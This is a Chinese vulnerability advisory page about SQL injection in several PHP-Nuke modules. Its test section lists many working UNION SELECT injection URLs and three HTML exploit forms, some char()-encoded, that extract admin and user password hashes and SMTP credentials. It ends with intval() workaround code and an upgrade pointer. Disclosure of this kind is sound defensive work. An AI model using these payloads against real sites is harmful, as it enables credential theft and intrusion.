首页 -> 安全研究
安全研究
安全漏洞
PHP-Nuke多个模块SQL注入漏洞
发布日期:2004-02-02
更新日期:2004-02-13
受影响系统:
Francisco Burzi PHP-Nuke 6.9不受影响系统:
Francisco Burzi PHP-Nuke 6.8
Francisco Burzi PHP-Nuke 6.7
Francisco Burzi PHP-Nuke 6.6
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 7.0描述:
BUGTRAQ ID: 9544
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
PHP-Nuke多个模块对用户提交数据缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL攻击,获得管理员帐户等。
第一个漏洞存在与/modules/Web_Links/index.php文件中,此模块多个函数对$cid参数的调用值缺少充分过滤,提交包含恶意SQL命令的数据作为此参数值,可绕过原有SQL逻辑,获得数据库中敏感信息,如管理员加密后密码的信息。
另一个漏洞存在与/modules/Downloads/index.php文件中,其中多个函数对SQL请求中包含的可修改变量没有过滤。同样问题还存在于mainfile.php文件中,此文件对GET请求作了适当过滤,而对POST请求缺没有进行正确处理。
<*来源:Security Corporation (advisory@security-corporation.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107577380625147&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
ECT%20pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
如果link 0不存在,显示登录的管理员名和密码。
- http://www.example.com/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
SELECT%20pwd%20FROM%20nuke_authors
Re-steer towards the encrypted password.
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
显示所有登录管理员及加密信息。
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
显示登录ID和所有成员的加密密码。
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
- http://www.example.com/modules.php?name=Downloads&d_op=modifydownloadrequest&
lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,
user_email,user_level,0,0%20FROM%20nuke_users
显示登录ID和所有成员的加密密码,名称,EMAIL,级别等信息。
- http://www.example.com/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
- http://www.example.com/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadcomments&
lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20
FROM%20nuke_users/*
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
显示登录ID和所有成员的加密密码。
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%20pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
- http://www.example.com/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
SELECT%20aid,pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho
rs/*
--------------------PHPNUKEexploit1.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Sections">
<input type="hidden" name="op" value="printpage">
<input type="text" name="artid" value="-1 UNION SELECT
CONCAT(name,char(58),aid),pwd FROM nuke_authors">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit1.html--------------------
--------------------PHPNUKEexploit2.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Downloads">
<input type="hidden" name="d_op" value="viewdownloadeditorial">
<input type="text" name="lid" value="-1 UNION SELECT
config_name,0,config_value,0 FROM nuke_bbconfig where
config_name=char(115,109,116,112,95,104,111,115,116) OR
config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR
config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit2.html--------------------
--------------------PHPNUKEexploit3.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method="POST" action="http://[target]/modules.php?name=Downloads">
<input type="hidden" name="d_op" value="viewdownloadeditorial">
<input type="text" name="lid" value="-1 UNION SELECT
char(120),NOW(),char(32),CONCAT(char(60,98,114,62,76,111,103,105,110,32,58,3
2),uname,char(60,98,114,62,60,98,114,62,80,97,115,115,119,111,114,100,32,58,
32),passwd,char(60,98,114,62))
FROM nuke_popsettings">
<input type="submit">
</form>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit3.html--------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在/modules/Web_Links/index.php文件中"switch($l_op) {"前增加如下行:
------------------------------------------------------------------------
$cid = intval($cid);
$min = intval($min);
$lid = intval($lid);
$parentid = intval($parentid);
------------------------------------------------------------------------
在/modules/Downloads/index.php文件中"switch($d_op) {":
------------------------------------------------------------------------
$cid = intval($cid);
$min = intval($min);
$sid = intval($sid);
$lid = intval($lid);
$cat = intval($cat);
------------------------------------------------------------------------
在/modules/Reviews/index.php文件"switch($rop) {"前增加/modules/Reviews/index.php:
------------------------------------------------------------------------
$id = intval($id);
$cid = intval($cid);
------------------------------------------------------------------------
在/modules/Sections/index.php文件"switch($op) {"前增加:
------------------------------------------------------------------------
$artid = intval($artid);
$secid = intval($secid);
------------------------------------------------------------------------
在/modules/Stories_Archive/index.php文件"switch($sa) {"前增加:
------------------------------------------------------------------------
$min = intval($min);
------------------------------------------------------------------------
厂商补丁:
Francisco Burzi
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载PHP-Nuke 7.0:
http://www.phpnuke.org
浏览次数:4797
严重程度:0(网友投票)
绿盟科技给您安全的保障